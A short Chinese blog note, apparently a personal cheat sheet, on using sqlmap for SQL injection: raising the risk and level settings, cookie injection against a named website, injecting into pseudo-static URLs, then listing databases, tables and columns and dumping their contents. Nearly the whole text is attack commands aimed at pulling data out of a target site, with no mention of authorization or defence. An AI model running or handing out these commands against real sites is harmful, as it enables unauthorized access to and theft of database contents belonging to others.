扶摇公子日记-sqlmap使用
提高sqlmap测试等级
‐‐risk这个参数就是把测试等级提⾼,如是--risk 3那么测试就是最⾼,这样SQLMap会测试更加多的注⼊语句
当程序有防get注入的时候,可以使用cookie注入
‐‐level cookice注入 sqlmap.py -u "http://www.haowin.com/index/php" -cookie "id=11" --level 2
注入伪静态
url虽然做了伪静态,但是还是需要传递参数到数据库去查询的
sqlmap.py -u www.xxxx.com/product/detail/id/3*.html -
发现注入点成功后
sqlmap.py -u URL --dbs --batch 获取全部数据库
sqlmap.py -u URL --current-db --batch 获取当前数据库
sqlmap.py -u URL -D 库名 --tables --batch 获取库里面所有的表
sqlmap.py -u URL -D 库名 -T 表明 --columns --batch 获取表里面的所有字段
sqlmap.py -u URL -D 库名 -T 表名 -C "字段,字段" --dump --batch //--dump获取字段里面的内容
如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据
--dump 可以换成 --dump-all则导出全部的内容

浙公网安备 33010602011771号